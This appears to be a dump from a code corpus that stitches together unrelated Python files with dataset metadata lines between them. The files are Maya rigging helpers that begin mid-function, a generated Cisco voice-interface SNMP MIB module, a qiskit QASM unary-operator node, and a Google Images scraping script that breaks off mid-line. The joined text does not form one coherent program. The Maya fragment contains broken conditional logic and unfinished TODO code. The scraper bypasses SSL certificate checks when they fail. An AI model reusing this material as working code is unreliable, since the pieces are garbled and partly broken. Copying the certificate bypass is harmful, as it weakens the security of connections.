Mirror object Parameter: obj_to_mirror = object to mirror plane = mirror plane ('YZ', 'XZ' or 'XY') Return: mirrored coords ''' mirrored = obj_to_mirror.replace('L','R') trs = cmds.xform(obj_to_mirror, q=True, t=True, ws=True) trs_vec = om.MVector(float(trs[0]), float(trs[1]), float(trs[2])) if plane == 'YZ': mirror_axis = om.MVector(-1, 1, 1) if plane == 'XZ': mirror_axis = om.MVector(1, -1, 1) if plane == 'XY': mirror_axis = om.MVector(1, 1, -1) else: pass mirrored_coords = om.MVector(trs_vec.x * mirror_axis.x, trs_vec.y * mirror_axis.y, trs_vec.z * mirror_axis.z) cmds.setAttr('%s.%s' % (mirrored, 'tx'), mirrored_coords.x ) cmds.setAttr('%s.%s' % (mirrored, 'ty'), mirrored_coords.y ) cmds.setAttr('%s.%s' % (mirrored, 'tz'), mirrored_coords.z ) return mirrored_coords # calculate the closest vertices from a given distance def get_closest_vertices_between(self, src, dst, dist): # ToDo: check code ''' Desc: Get the vertices of dst that lie within a given distance from the vertices of src Parameter: src = source mesh dst = destination mesh dist = distance threshold Return: None ''' # Get the relative MObject to use API methods for source and destination oSrc = KstCore.get_mobject_from_name(src) oDst = KstCore.get_mobject_from_name(dst) # Get the relative DAG to use API methods for source and destination dSrc = KstCore.get_dag_from_node_name(src) dDst = KstCore.get_dag_from_node_name(dst) # Attach mesh functions to src and dst objects srcFnMesh = om.MFnMesh(dSrc) dstFnMesh = om.MFnMesh(dDst) # Define the list for closestVertex storage closest_vlist = list() # Check if the datatype is mesh if srcFnMesh.type() == om.MFn.kMesh and dstFnMesh.type() == om.MFn.kMesh: srcItVert = om.MItMeshVertex(oSrc) dstItVert = om.MItMeshVertex(oDst) # Define variables for mesh iterator srcVtxPos = om.MPoint() dstVtxPos = om.MPoint() ws = om.MSpace.kObject # Define empty point cloud to store all positions from the iterator srcVtxsPos = om.MPointArray() # Define empty point cloud for storing the closest points result 
closestPoints = om.MPointOnMesh() # Define MMeshIntersector on destination mesh for get closest point meshIntersector = om.MMeshIntersector() # Define a DAGPath for retrieve selection based on component selectionClosest = om.MSelectionList() selection_dag = om.MDagPath() # Iterate over all mesh vertices, and get all positions while not srcItVert.isDone(): # Get current position srcVtxPos = srcItVert.position(ws) while not dstItVert.isDone(): srcVtxDest = dstItVert.position(ws) mag = KstMath.get_mag(KstMath.vec_from_2_points(srcVtxPos, srcVtxDest)) if mag <= dist: closest_vlist.append(dstItVert.index()) cmds.select(dst+'.vtx[%s]' % dstItVert.index(), add=True) dstItVert.next() srcItVert.next() print('ARRAY CLOSEST: ', closest_vlist) ''' clothRigGrp = "clothAnimRig_GRP" jntPos = cmds.xform(jnt, q=True, ws=True, t=True) sel = sel.replace("[u'","") sel = sel.replace("']","") scluster = str(sknMsh) scluster = scluster.replace("[u'","") scluster = scluster.replace("']","") vtxs = cmds.polyEvaluate(sel, v=True) ntotVtxs = vtxs/njoints closestPoints = [] #print jntPos #for i in xrange(vtxs): for i in range(500): vtx = (sel+".vtx["+str(i)+"]") print " " print vtx if cmds.progressBar(progressControl, query = True, isCancelled = True): break #if i%2 == 1: ppos = [] ppos = cmds.xform((sel+".vtx["+str(i)+"]"), q = True, ws = True, t = True) newpos = [ppos[0] - jntPos[0], ppos[1] - jntPos[1], ppos[2] - jntPos[2]] res = mag(newpos) cmds.text(stat, edit=True, label = (str(i)+"/"+str(vtxs))) skinJointsList = maya.mel.eval('skinPercent -query -transform %(scluster)s %(vtx)s' %vars()) # ToDo: skinCluster conversion\ trackers = [] weights = [] newjnt = [] cpStra = 'pointConstraint -mo ' cpStrb = '' for obj in skinJointsList: transform = obj joints = (obj+".vtx["+str(i)+"]JNT") skinValue = maya.mel.eval('skinPercent -transform %(transform)s -query -value %(scluster)s %(vtx)s' %vars()) #print ("DEBUG: "+str(transform)+" VALUE: "+str(skinValue)) if (res <= dist): newjnt = cmds.joint(n = (obj+".vtx["+str(i)+"]JNT"),p = ppos) cmds.setAttr((newjnt+'.radius'),.05) cmds.parent(newjnt, clothRigGrp) trackers.append(obj) weights.append(skinValue) if len(trackers) > 0: print trackers print weights #print trackers #print weights #cmds.pointConstraint(trackers, newjnt, mo = True) #cpStra+= ('%(trackers)s ') #cpStrj= ('%(joints)s ') #cpStrb+= ('%(weights)s ') #print(cpStra+cpStrj) #print trackers #print weights cmds.progressBar(progressControl, edit = True, step = 1) ''' # Abc code def abc_import(self, mode='Import', namespace='', file_path=''): cmdStr = '' # Import if mode == 'Import': cmds.file(file_path, i=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace) # Reference if mode == 'Reference': cmds.file(file_path, r=True, type='Alembic', ignoreVersion=True, gl=True, rpr=namespace) def foo(self): pass
bsd-3-clause
-8,954,775,622,513,176,000
34.689055
303
0.545569
false
4.001813
false
false
false
xiangke/pycopia
mibs/pycopia/mibs/CISCO_VOICE_IF_MIB.py
1
6172
# python # This file is generated by a program (mib2py). Any edits will be lost. from pycopia.aid import Enum import pycopia.SMI.Basetypes Range = pycopia.SMI.Basetypes.Range Ranges = pycopia.SMI.Basetypes.Ranges from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject # imports from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP from IF_MIB import ifIndex from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, Integer32 from CISCO_TC import CountryCode from CISCO_SMI import ciscoMgmt from SNMPv2_TC import TruthValue, DisplayString class CISCO_VOICE_IF_MIB(ModuleObject): path = '/usr/share/snmp/mibs/site/CISCO-VOICE-IF-MIB' conformance = 3 name = 'CISCO-VOICE-IF-MIB' language = 2 description = 'Common Voice Interface MIB module.\nThe MIB module manages the common voice related parameters\nfor both voice analog and ISDN interfaces.' # nodes class ciscoVoiceInterfaceMIB(NodeObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64]) name = 'ciscoVoiceInterfaceMIB' class cvIfObjects(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1]) name = 'cvIfObjects' class cvIfCfgObjects(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1]) name = 'cvIfCfgObjects' class cvIfConformance(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2]) name = 'cvIfConformance' class cvIfCompliances(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 1]) name = 'cvIfCompliances' class cvIfGroups(NodeObject): OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2]) name = 'cvIfGroups' # macros # types # scalars # columns class cvIfCfgNoiseRegEnable(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 1]) syntaxobject = pycopia.SMI.Basetypes.TruthValue class cvIfCfgNonLinearProcEnable(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 2]) syntaxobject = pycopia.SMI.Basetypes.TruthValue class cvIfCfgMusicOnHoldThreshold(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 3]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'dBm' class cvIfCfgInGain(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 4]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'dB' class cvIfCfgOutAttn(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 5]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'dB' class cvIfCfgEchoCancelEnable(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 6]) syntaxobject = pycopia.SMI.Basetypes.TruthValue class cvIfCfgEchoCancelCoverage(ColumnObject): status = 1 access = 5 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 7]) syntaxobject = pycopia.SMI.Basetypes.Enumeration enumerations = [Enum(1, 'echoCanceller16ms'), Enum(2, 'echoCanceller24ms'), Enum(3, 'echoCanceller32ms')] class cvIfCfgConnectionMode(ColumnObject): status = 1 access = 5 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 8]) syntaxobject = 
pycopia.SMI.Basetypes.Enumeration enumerations = [Enum(1, 'normal'), Enum(2, 'trunk'), Enum(3, 'plar')] class cvIfCfgConnectionNumber(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 9]) syntaxobject = pycopia.SMI.Basetypes.DisplayString class cvIfCfgInitialDigitTimeOut(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 10]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'seconds' class cvIfCfgInterDigitTimeOut(ColumnObject): status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 11]) syntaxobject = pycopia.SMI.Basetypes.Integer32 access = 5 units = 'seconds' class cvIfCfgRegionalTone(ColumnObject): access = 5 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 12]) syntaxobject = CountryCode # rows class cvIfCfgEntry(RowObject): status = 1 index = pycopia.SMI.Objects.IndexObjects([ifIndex], False) OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1]) access = 2 columns = {'cvIfCfgNoiseRegEnable': cvIfCfgNoiseRegEnable, 'cvIfCfgNonLinearProcEnable': cvIfCfgNonLinearProcEnable, 'cvIfCfgMusicOnHoldThreshold': cvIfCfgMusicOnHoldThreshold, 'cvIfCfgInGain': cvIfCfgInGain, 'cvIfCfgOutAttn': cvIfCfgOutAttn, 'cvIfCfgEchoCancelEnable': cvIfCfgEchoCancelEnable, 'cvIfCfgEchoCancelCoverage': cvIfCfgEchoCancelCoverage, 'cvIfCfgConnectionMode': cvIfCfgConnectionMode, 'cvIfCfgConnectionNumber': cvIfCfgConnectionNumber, 'cvIfCfgInitialDigitTimeOut': cvIfCfgInitialDigitTimeOut, 'cvIfCfgInterDigitTimeOut': cvIfCfgInterDigitTimeOut, 'cvIfCfgRegionalTone': cvIfCfgRegionalTone} # notifications (traps) # groups class cvIfGroup(GroupObject): access = 2 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 1]) group = [cvIfCfgNoiseRegEnable, cvIfCfgNonLinearProcEnable, cvIfCfgMusicOnHoldThreshold, cvIfCfgInGain, cvIfCfgOutAttn, cvIfCfgEchoCancelEnable, cvIfCfgEchoCancelCoverage, cvIfCfgInitialDigitTimeOut, cvIfCfgInterDigitTimeOut, cvIfCfgRegionalTone] class cvIfConnectionGroup(GroupObject): access = 2 status = 1 OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 2]) group = [cvIfCfgConnectionMode, cvIfCfgConnectionNumber] # capabilities # special additions # Add to master OIDMAP. from pycopia import SMI SMI.update_oidmap(__name__)
lgpl-2.1
-397,005,942,782,059,600
33.870056
607
0.733798
false
2.627501
false
false
false
atilag/qiskit-sdk-py
qiskit/qasm/_node/_unaryoperator.py
1
1662
# -*- coding: utf-8 -*- # Copyright 2017 IBM RESEARCH. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """ Node for an OPENQASM unary operator. """ import operator from ._node import Node from ._nodeexception import NodeException VALID_OPERATORS = { '+': operator.pos, '-': operator.neg, } class UnaryOperator(Node): """Node for an OPENQASM unary operator. This node has no children. The data is in the value field. """ def __init__(self, operation): """Create the operator node.""" Node.__init__(self, 'unary_operator', None, None) self.value = operation def operation(self): """ Return the operator as a function f(left, right). """ try: return VALID_OPERATORS[self.value] except KeyError: raise NodeException("internal error: undefined prefix '%s'" % self.value) def qasm(self, prec=15): """Return QASM representation.""" # pylint: disable=unused-argument return self.value
apache-2.0
6,572,356,457,025,158,000
28.678571
79
0.619134
false
4.373684
false
false
false
hardikvasa/google-images-download
google_images_download/google_images_download.py
1
52513
#!/usr/bin/env python # coding: utf-8 ###### Searching and Downloading Google Images to the local disk ###### # Import Libraries import sys version = (3, 0) cur_version = sys.version_info if cur_version >= version: # If the Current Version of Python is 3.0 or above import urllib.request from urllib.request import Request, urlopen from urllib.request import URLError, HTTPError from urllib.parse import quote import http.client from http.client import IncompleteRead, BadStatusLine http.client._MAXHEADERS = 1000 else: # If the Current Version of Python is 2.x import urllib2 from urllib2 import Request, urlopen from urllib2 import URLError, HTTPError from urllib import quote import httplib from httplib import IncompleteRead, BadStatusLine httplib._MAXHEADERS = 1000 import time # Importing the time library to check the time of code execution import os import argparse import ssl import datetime import json import re import codecs import socket args_list = ["keywords", "keywords_from_file", "prefix_keywords", "suffix_keywords", "limit", "format", "color", "color_type", "usage_rights", "size", "exact_size", "aspect_ratio", "type", "time", "time_range", "delay", "url", "single_image", "output_directory", "image_directory", "no_directory", "proxy", "similar_images", "specific_site", "print_urls", "print_size", "print_paths", "metadata", "extract_metadata", "socket_timeout", "thumbnail", "thumbnail_only", "language", "prefix", "chromedriver", "related_images", "safe_search", "no_numbering", "offset", "no_download","save_source","silent_mode","ignore_urls"] def user_input(): config = argparse.ArgumentParser() config.add_argument('-cf', '--config_file', help='config file name', default='', type=str, required=False) config_file_check = config.parse_known_args() object_check = vars(config_file_check[0]) if object_check['config_file'] != '': records = [] json_file = json.load(open(config_file_check[0].config_file)) for record in range(0,len(json_file['Records'])): arguments = {} for i in args_list: arguments[i] = None for key, value in json_file['Records'][record].items(): arguments[key] = value records.append(arguments) records_count = len(records) else: # Taking command line arguments from users parser = argparse.ArgumentParser() parser.add_argument('-k', '--keywords', help='delimited list input', type=str, required=False) parser.add_argument('-kf', '--keywords_from_file', help='extract list of keywords from a text file', type=str, required=False) parser.add_argument('-sk', '--suffix_keywords', help='comma separated additional words added after the main keyword', type=str, required=False) parser.add_argument('-pk', '--prefix_keywords', help='comma separated additional words added before the main keyword', type=str, required=False) parser.add_argument('-l', '--limit', help='maximum number of images to download', type=str, required=False) parser.add_argument('-f', '--format', help='download images with specific format', type=str, required=False, choices=['jpg', 'gif', 'png', 'bmp', 'svg', 'webp', 'ico']) parser.add_argument('-u', '--url', help='search with google image URL', type=str, required=False) parser.add_argument('-x', '--single_image', help='downloading a single image from URL', type=str, required=False) parser.add_argument('-o', '--output_directory', help='download images in a specific main directory', type=str, required=False) parser.add_argument('-i', '--image_directory', help='download images in a specific sub-directory', type=str, required=False) parser.add_argument('-n', '--no_directory', default=False, 
help='download images in the main directory but no sub-directory', action="store_true") parser.add_argument('-d', '--delay', help='delay in seconds to wait between downloading two images', type=int, required=False) parser.add_argument('-co', '--color', help='filter on color', type=str, required=False, choices=['red', 'orange', 'yellow', 'green', 'teal', 'blue', 'purple', 'pink', 'white', 'gray', 'black', 'brown']) parser.add_argument('-ct', '--color_type', help='filter on color type', type=str, required=False, choices=['full-color', 'black-and-white', 'transparent']) parser.add_argument('-r', '--usage_rights', help='usage rights', type=str, required=False, choices=['labeled-for-reuse-with-modifications','labeled-for-reuse','labeled-for-noncommercial-reuse-with-modification','labeled-for-nocommercial-reuse']) parser.add_argument('-s', '--size', help='image size', type=str, required=False, choices=['large','medium','icon','>400*300','>640*480','>800*600','>1024*768','>2MP','>4MP','>6MP','>8MP','>10MP','>12MP','>15MP','>20MP','>40MP','>70MP']) parser.add_argument('-es', '--exact_size', help='exact image resolution "WIDTH,HEIGHT"', type=str, required=False) parser.add_argument('-t', '--type', help='image type', type=str, required=False, choices=['face','photo','clipart','line-drawing','animated']) parser.add_argument('-w', '--time', help='image age', type=str, required=False, choices=['past-24-hours','past-7-days','past-month','past-year']) parser.add_argument('-wr', '--time_range', help='time range for the age of the image. should be in the format {"time_min":"MM/DD/YYYY","time_max":"MM/DD/YYYY"}', type=str, required=False) parser.add_argument('-a', '--aspect_ratio', help='filter on the aspect ratio of the image', type=str, required=False, choices=['tall', 'square', 'wide', 'panoramic']) parser.add_argument('-si', '--similar_images', help='downloads images very similar to the image URL you provide', type=str, required=False) parser.add_argument('-ss', '--specific_site', help='downloads images that are indexed from a specific website', type=str, required=False) parser.add_argument('-p', '--print_urls', default=False, help="Print the URLs of the images", action="store_true") parser.add_argument('-ps', '--print_size', default=False, help="Print the size of the images on disk", action="store_true") parser.add_argument('-pp', '--print_paths', default=False, help="Prints the list of absolute paths of the images",action="store_true") parser.add_argument('-m', '--metadata', default=False, help="Print the metadata of the image", action="store_true") parser.add_argument('-e', '--extract_metadata', default=False, help="Dumps all the logs into a text file", action="store_true") parser.add_argument('-st', '--socket_timeout', default=False, help="Connection timeout waiting for the image to download", type=float) parser.add_argument('-th', '--thumbnail', default=False, help="Downloads image thumbnail along with the actual image", action="store_true") parser.add_argument('-tho', '--thumbnail_only', default=False, help="Downloads only thumbnail without downloading actual images", action="store_true") parser.add_argument('-la', '--language', default=False, help="Defines the language filter. 
The search results are automatically returned in that language", type=str, required=False, choices=['Arabic','Chinese (Simplified)','Chinese (Traditional)','Czech','Danish','Dutch','English','Estonian','Finnish','French','German','Greek','Hebrew','Hungarian','Icelandic','Italian','Japanese','Korean','Latvian','Lithuanian','Norwegian','Portuguese','Polish','Romanian','Russian','Spanish','Swedish','Turkish']) parser.add_argument('-pr', '--prefix', default=False, help="A word that you would want to prefix in front of each image name", type=str, required=False) parser.add_argument('-px', '--proxy', help='specify a proxy address and port', type=str, required=False) parser.add_argument('-cd', '--chromedriver', help='specify the path to chromedriver executable in your local machine', type=str, required=False) parser.add_argument('-ri', '--related_images', default=False, help="Downloads images that are similar to the keyword provided", action="store_true") parser.add_argument('-sa', '--safe_search', default=False, help="Turns on the safe search filter while searching for images", action="store_true") parser.add_argument('-nn', '--no_numbering', default=False, help="Allows you to exclude the default numbering of images", action="store_true") parser.add_argument('-of', '--offset', help="Where to start in the fetched links", type=str, required=False) parser.add_argument('-nd', '--no_download', default=False, help="Prints the URLs of the images and/or thumbnails without downloading them", action="store_true") parser.add_argument('-iu', '--ignore_urls', default=False, help="delimited list input of image urls/keywords to ignore", type=str) parser.add_argument('-sil', '--silent_mode', default=False, help="Remains silent. Does not print notification messages on the terminal", action="store_true") parser.add_argument('-is', '--save_source', help="creates a text file containing a list of downloaded images along with source page url", type=str, required=False) args = parser.parse_args() arguments = vars(args) records = [] records.append(arguments) return records class googleimagesdownload: def __init__(self): pass # Downloading entire Web Document (Raw Page Content) def download_page(self,url): version = (3, 0) cur_version = sys.version_info if cur_version >= version: # If the Current Version of Python is 3.0 or above try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req = urllib.request.Request(url, headers=headers) resp = urllib.request.urlopen(req) respData = str(resp.read()) return respData except Exception as e: print("Could not open URL. Please check your internet connection and/or ssl settings \n" "If you are using proxy, make sure your proxy settings are configured correctly") sys.exit() else: # If the Current Version of Python is 2.x try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req = urllib2.Request(url, headers=headers) try: response = urllib2.urlopen(req) except URLError: # Handling SSL certificate failed context = ssl._create_unverified_context() response = urlopen(req, context=context) page = response.read() return page except: print("Could not open URL. 
Please check your internet connection and/or ssl settings \n" "If you are using proxy, make sure your proxy settings are configured correctly") sys.exit() return "Page Not found" # Download Page for more than 100 images def download_extended_page(self,url,chromedriver): from selenium import webdriver from selenium.webdriver.common.keys import Keys if sys.version_info[0] < 3: reload(sys) sys.setdefaultencoding('utf8') options = webdriver.ChromeOptions() options.add_argument('--no-sandbox') options.add_argument("--headless") try: browser = webdriver.Chrome(chromedriver, chrome_options=options) except Exception as e: print("Looks like we cannot locate the path to the 'chromedriver' (use the '--chromedriver' " "argument to specify the path to the executable.) or google chrome browser is not " "installed on your machine (exception: %s)" % e) sys.exit() browser.set_window_size(1024, 768) # Open the link browser.get(url) time.sleep(1) print("Getting you a lot of images. This may take a few moments...") element = browser.find_element_by_tag_name("body") # Scroll down for i in range(30): element.send_keys(Keys.PAGE_DOWN) time.sleep(0.3) try: browser.find_element_by_id("smb").click() for i in range(50): element.send_keys(Keys.PAGE_DOWN) time.sleep(0.3) # bot id protection except: for i in range(10): element.send_keys(Keys.PAGE_DOWN) time.sleep(0.3) # bot id protection print("Reached end of Page.") time.sleep(0.5) source = browser.page_source #page source #close the browser browser.close() return source #Correcting the escape characters for python2 def replace_with_byte(self,match): return chr(int(match.group(0)[1:], 8)) def repair(self,brokenjson): invalid_escape = re.compile(r'\\[0-7]{1,3}') # up to 3 digits for byte values up to FF return invalid_escape.sub(self.replace_with_byte, brokenjson) # Finding 'Next Image' from the given raw page def get_next_tab(self,s): start_line = s.find('class="dtviD"') if start_line == -1: # If no links are found then give an error! 
end_quote = 0 link = "no_tabs" return link,'',end_quote else: start_line = s.find('class="dtviD"') start_content = s.find('href="', start_line + 1) end_content = s.find('">', start_content + 1) url_item = "https://www.google.com" + str(s[start_content + 6:end_content]) url_item = url_item.replace('&amp;', '&') start_line_2 = s.find('class="dtviD"') s = s.replace('&amp;', '&') start_content_2 = s.find(':', start_line_2 + 1) end_content_2 = s.find('&usg=', start_content_2 + 1) url_item_name = str(s[start_content_2 + 1:end_content_2]) chars = url_item_name.find(',g_1:') chars_end = url_item_name.find(":", chars + 6) if chars_end == -1: updated_item_name = (url_item_name[chars + 5:]).replace("+", " ") else: updated_item_name = (url_item_name[chars+5:chars_end]).replace("+", " ") return url_item, updated_item_name, end_content # Getting all links with the help of '_images_get_next_image' def get_all_tabs(self,page): tabs = {} while True: item,item_name,end_content = self.get_next_tab(page) if item == "no_tabs": break else: if len(item_name) > 100 or item_name == "background-color": break else: tabs[item_name] = item # Append all the links in the list named 'Links' time.sleep(0.1) # Timer could be used to slow down the request for image downloads page = page[end_content:] return tabs #Format the object in readable format def format_object(self,object): formatted_object = {} formatted_object['image_format'] = object['ity'] formatted_object['image_height'] = object['oh'] formatted_object['image_width'] = object['ow'] formatted_object['image_link'] = object['ou'] formatted_object['image_description'] = object['pt'] formatted_object['image_host'] = object['rh'] formatted_object['image_source'] = object['ru'] formatted_object['image_thumbnail_url'] = object['tu'] return formatted_object #function to download single image def single_image(self,image_url): main_directory = "downloads" extensions = (".jpg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico") url = image_url try: os.makedirs(main_directory) except OSError as e: if e.errno != 17: raise pass req = Request(url, headers={ "User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"}) response = urlopen(req, None, 10) data = response.read() response.close() image_name = str(url[(url.rfind('/')) + 1:]) if '?' 
in image_name: image_name = image_name[:image_name.find('?')] # if ".jpg" in image_name or ".gif" in image_name or ".png" in image_name or ".bmp" in image_name or ".svg" in image_name or ".webp" in image_name or ".ico" in image_name: if any(map(lambda extension: extension in image_name, extensions)): file_name = main_directory + "/" + image_name else: file_name = main_directory + "/" + image_name + ".jpg" image_name = image_name + ".jpg" try: output_file = open(file_name, 'wb') output_file.write(data) output_file.close() except IOError as e: raise e except OSError as e: raise e print("completed ====> " + image_name.encode('raw_unicode_escape').decode('utf-8')) return def similar_images(self,similar_images): version = (3, 0) cur_version = sys.version_info if cur_version >= version: # If the Current Version of Python is 3.0 or above try: searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images headers = {} headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" req1 = urllib.request.Request(searchUrl, headers=headers) resp1 = urllib.request.urlopen(req1) content = str(resp1.read()) l1 = content.find('AMhZZ') l2 = content.find('&', l1) urll = content[l1:l2] newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X" req2 = urllib.request.Request(newurl, headers=headers) resp2 = urllib.request.urlopen(req2) l3 = content.find('/search?sa=X&amp;q=') l4 = content.find(';', l3 + 19) urll2 = content[l3 + 19:l4] return urll2 except: return "Could not connect to Google Images endpoint" else: # If the Current Version of Python is 2.x try: searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images headers = {} headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17" req1 = urllib2.Request(searchUrl, headers=headers) resp1 = urllib2.urlopen(req1) content = str(resp1.read()) l1 = content.find('AMhZZ') l2 = content.find('&', l1) urll = content[l1:l2] newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X" req2 = urllib2.Request(newurl, headers=headers) resp2 = urllib2.urlopen(req2) l3 = content.find('/search?sa=X&amp;q=') l4 = content.find(';', l3 + 19) urll2 = content[l3 + 19:l4] return(urll2) except: return "Could not connect to Google Images endpoint" #Building URL parameters def build_url_parameters(self,arguments): if arguments['language']: lang = "&lr=" lang_param = {"Arabic":"lang_ar","Chinese (Simplified)":"lang_zh-CN","Chinese (Traditional)":"lang_zh-TW","Czech":"lang_cs","Danish":"lang_da","Dutch":"lang_nl","English":"lang_en","Estonian":"lang_et","Finnish":"lang_fi","French":"lang_fr","German":"lang_de","Greek":"lang_el","Hebrew":"lang_iw ","Hungarian":"lang_hu","Icelandic":"lang_is","Italian":"lang_it","Japanese":"lang_ja","Korean":"lang_ko","Latvian":"lang_lv","Lithuanian":"lang_lt","Norwegian":"lang_no","Portuguese":"lang_pt","Polish":"lang_pl","Romanian":"lang_ro","Russian":"lang_ru","Spanish":"lang_es","Swedish":"lang_sv","Turkish":"lang_tr"} lang_url = lang+lang_param[arguments['language']] else: lang_url = '' if arguments['time_range']: json_acceptable_string = arguments['time_range'].replace("'", "\"") d = json.loads(json_acceptable_string) time_range = ',cdr:1,cd_min:' + d['time_min'] + ',cd_max:' + d['time_max'] else: time_range = '' if arguments['exact_size']: size_array = [x.strip() for x in arguments['exact_size'].split(',')] 
exact_size = ",isz:ex,iszw:" + str(size_array[0]) + ",iszh:" + str(size_array[1]) else: exact_size = '' built_url = "&tbs=" counter = 0 params = {'color':[arguments['color'],{'red':'ic:specific,isc:red', 'orange':'ic:specific,isc:orange', 'yellow':'ic:specific,isc:yellow', 'green':'ic:specific,isc:green', 'teal':'ic:specific,isc:teal', 'blue':'ic:specific,isc:blue', 'purple':'ic:specific,isc:purple', 'pink':'ic:specific,isc:pink', 'white':'ic:specific,isc:white', 'gray':'ic:specific,isc:gray', 'black':'ic:specific,isc:black', 'brown':'ic:specific,isc:brown'}], 'color_type':[arguments['color_type'],{'full-color':'ic:color', 'black-and-white':'ic:gray','transparent':'ic:trans'}], 'usage_rights':[arguments['usage_rights'],{'labeled-for-reuse-with-modifications':'sur:fmc','labeled-for-reuse':'sur:fc','labeled-for-noncommercial-reuse-with-modification':'sur:fm','labeled-for-nocommercial-reuse':'sur:f'}], 'size':[arguments['size'],{'large':'isz:l','medium':'isz:m','icon':'isz:i','>400*300':'isz:lt,islt:qsvga','>640*480':'isz:lt,islt:vga','>800*600':'isz:lt,islt:svga','>1024*768':'isz:lt,islt:xga','>2MP':'isz:lt,islt:2mp','>4MP':'isz:lt,islt:4mp','>6MP':'isz:lt,islt:6mp','>8MP':'isz:lt,islt:8mp','>10MP':'isz:lt,islt:10mp','>12MP':'isz:lt,islt:12mp','>15MP':'isz:lt,islt:15mp','>20MP':'isz:lt,islt:20mp','>40MP':'isz:lt,islt:40mp','>70MP':'isz:lt,islt:70mp'}], 'type':[arguments['type'],{'face':'itp:face','photo':'itp:photo','clipart':'itp:clipart','line-drawing':'itp:lineart','animated':'itp:animated'}], 'time':[arguments['time'],{'past-24-hours':'qdr:d','past-7-days':'qdr:w','past-month':'qdr:m','past-year':'qdr:y'}], 'aspect_ratio':[arguments['aspect_ratio'],{'tall':'iar:t','square':'iar:s','wide':'iar:w','panoramic':'iar:xw'}], 'format':[arguments['format'],{'jpg':'ift:jpg','gif':'ift:gif','png':'ift:png','bmp':'ift:bmp','svg':'ift:svg','webp':'ift:webp','ico':'ift:ico','raw':'ift:craw'}]} for 